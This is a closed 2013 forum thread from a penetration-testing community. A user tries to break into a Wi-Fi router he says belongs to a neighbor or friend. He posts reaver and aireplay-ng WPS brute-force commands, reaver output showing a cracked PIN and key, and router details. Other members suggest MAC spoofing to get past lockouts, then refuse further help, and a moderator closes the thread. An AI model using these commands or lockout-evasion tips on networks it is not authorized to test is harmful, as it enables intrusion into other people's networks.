July 25, 2017, 07:51:04 AM
Welcome, Guest. Please login or register.

"640 K ought to be enough for anybody." -- Bill Gates

Author Topic: handshake found bruteforce && Reaver Ap limit  (Read 10230 times)

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1247
  • Internets: +192/-0
Re: handshake found bruteforce && Reaver Ap limit
« Reply #15 on: November 16, 2013, 03:33:55 AM »
Your 'friend' should be kind enough to simply offer you the password without you needing to disrupt his/her network by trying to crack it..
Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

Offline d??????????4????????????r???????k?????????????c???????????a?

  • Experienced
  • ***
  • Posts: 224
  • Internets: +89/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #16 on: November 16, 2013, 03:34:51 AM »
sounds legit, i'll go and read about how to do that and get back to you..

Offline maverikxxx

  • Prospect
  • *
  • Posts: 14
  • Internets: +1/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #17 on: November 16, 2013, 07:47:07 AM »
For Tape: yes, I study medicine my friend work....The challenge decided him .....

In a week I was able to learn a lot in fact I did a lot of testing on my network.
Who wants to help me write me in private so I send you the file  4-way handshake
Thank guys

Offline maverikxxx

  • Prospect
  • *
  • Posts: 14
  • Internets: +1/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #18 on: November 16, 2013, 07:58:39 AM »
Report Reaver

hw Centrino intel 512 ram
alfa network awus036nh and alfa network awus036h

root@bt:~# reaver -i mon0  -b B8:A3:86:E7:XX:XX  -vv -L

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session for B8:A3:86:E7:XX:XX? [n/Y] n
  • Waiting for beacon from B8:A3:86:E7:XX:XX
  • Switching mon0 to channel 1
  • Switching mon0 to channel 2
  • Switching mon0 to channel 3
  • Switching mon0 to channel 6
  • Associated with B8:A3:86:E7:D8:F0 (ESSID: za_Home)
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received M5 message
  • Sending M6 message
  • Received M7 message
  • Sending WSC NACK
  • Sending WSC NACK
  • Pin cracked in 39 seconds
  • WPS PIN: '12345670'
  • WPA PSK: 'A22092CED44E050AF9363EE8129277F4276F3462FEA36D0EF8A411C154E7B4EF'
  • AP SSID: 'Network-b8a386e7d8f0'
  • Nothing done, nothing to save.

root@bt:~#
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
B8:A3:86:E7:XX:XX       6            -47        1.0               No                za_Home
« Last Edit: November 16, 2013, 08:52:09 AM by maverikxxx »

Offline 0E 800

  • If something can corrupt you, you're corrupted already.
  • Top Hat Member
  • Elite
  • ********
  • Posts: 961
  • Internets: +154/-0
  • ??? ???????? ?s ?? ??c?c??-???
Re: handshake found bruteforce && Reaver Ap limit
« Reply #19 on: November 16, 2013, 09:59:12 AM »
I see you got alfa network awus036nh and alfa network awus036h, which one are you using on mon0?

Also essid is stated to be za_Home but on the bottom is says its Network-b8a386e7d8f0.

I would try booting from a pentest livecd/liveusb and try running the reaver attack from live and see if your output changes or stays the same. Also, if it really is your 'friend and neighbor' go get the make and model of the AP and post that back.
"He who passes not his days in the realm of dreams is the slave of the days."

Offline maverikxxx

  • Prospect
  • *
  • Posts: 14
  • Internets: +1/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #20 on: November 16, 2013, 01:09:52 PM »
1. I use  awus036nh more sensitive
2.Network-b8a386e7d8f0 and pin 12345670 is fake?
3.Neatger WGR614

I try to use this comand

aireplay-ng mon0 -1 120 -a B8:A3:86:E7:D8:F0 -e za_home -q 5
reaver -i mon0 -c 6 -A -b B8:A3:86:E7:D8:F0 -vv -N -w -t 5 -L -x -d 0 -r 5:3 -S


Offline 0E 800

  • If something can corrupt you, you're corrupted already.
  • Top Hat Member
  • Elite
  • ********
  • Posts: 961
  • Internets: +154/-0
  • ??? ???????? ?s ?? ??c?c??-???
Re: handshake found bruteforce && Reaver Ap limit
« Reply #21 on: November 16, 2013, 06:20:38 PM »
Please review: https://code.google.com/p/reaver-wps/issues/detail?id=23

"Netgears are known to implement lockouts. Some only lock you out for 5 minutes, some may lock you out longer, or even indefinitely."

You might try spoofing your mac address and see if you get different results. Or change your mac to that of one already associated with the AP. Also as they state in above link, you might try installing the latest reaver from svn or git.
"He who passes not his days in the realm of dreams is the slave of the days."

Offline corr.x86

  • Top Hat Member
  • Elite
  • ********
  • Posts: 1111
  • Internets: +10/-0
  • ^That's a lie
Re: handshake found bruteforce && Reaver Ap limit
« Reply #22 on: November 16, 2013, 07:53:44 PM »
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=WPSIG

Here's something that might help you figure something out... Just saw a twit of it today.
"I have this assignment bla bla bla, can you give me teh codez?"

"www.adoptamalware.com would be a nice website to run."

Offline maverikxxx

  • Prospect
  • *
  • Posts: 14
  • Internets: +1/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #23 on: November 17, 2013, 12:38:06 AM »
Hi guys ,
today the girl breaks the balls  :'(   .....
I try all the solutions on Monday evening.
However, I have the latest version 1.4 of reaver nad I have already tried to change my mac but without result.
 I have the handshake we can do something? thank you

Offline maverikxxx

  • Prospect
  • *
  • Posts: 14
  • Internets: +1/-1
Re: handshake found bruteforce && Reaver Ap limit
« Reply #24 on: November 18, 2013, 08:38:27 AM »
[B8:A3:86:E7:D8:F0] - 'za_Home'
D-Link International (oui.txt vendor)
WPS Information
  * Device Name: 'AyecomWPSAP'
  * Wi-Fi Protected Setup State: 'Not Configured'
  * UUID-E: '00000000000010000000B8A386E7D8F0'
  * Response Type: 'AP'
  * Primary Device Type: 'Network Infrastructure - AP'
  * Model Number: 'DSL2740'
  * AP Setup Locked: '\x01'
  * Serial Number: '12345'
  * Version: '\x10'
  * RF Bands: '\x03'
  * Model Name: 'AyecomWAP'
  * Vendor Extension: '\x00$\xe2`\x02\x00\x01\x01`\x00\x00\x02\x00\x01`\x01\x00\x02\x00\x01'
  * Config Methods: '\x01\xae'
  * Manufacturer: 'Ayecom'

The router is Ayecom
I try all with reaver but this not work the signal is good.
this is the file cap
« Last Edit: November 18, 2013, 09:54:03 AM by TAPE »

Offline 0E 800

  • If something can corrupt you, you're corrupted already.
  • Top Hat Member
  • Elite
  • ********
  • Posts: 961
  • Internets: +154/-0
  • ??? ???????? ?s ?? ??c?c??-???
Re: handshake found bruteforce && Reaver Ap limit
« Reply #25 on: November 18, 2013, 09:25:16 AM »
I am no longer able to help you with this as you are not following the rules and guidelines as suggested by GalaxyNinja or the advice by TAPE. THS Forum is all for education about network penetration testing and in my opinion not about submitting files to be cracked by other members. 

I would suggest that you perform reaver exploits on your own AP's and should accept the possibility that your neighbors router (for whatever reason) is not vulnerable to WPS exploit.

This thread should be closed, any further inquiry should be done by pm.
« Last Edit: November 18, 2013, 09:51:18 AM by 0E 800 »
"He who passes not his days in the realm of dreams is the slave of the days."

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1247
  • Internets: +192/-0
Re: handshake found bruteforce && Reaver Ap limit
« Reply #26 on: November 18, 2013, 09:54:41 AM »
Agreed and so it shall be.

Thread closed.
Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik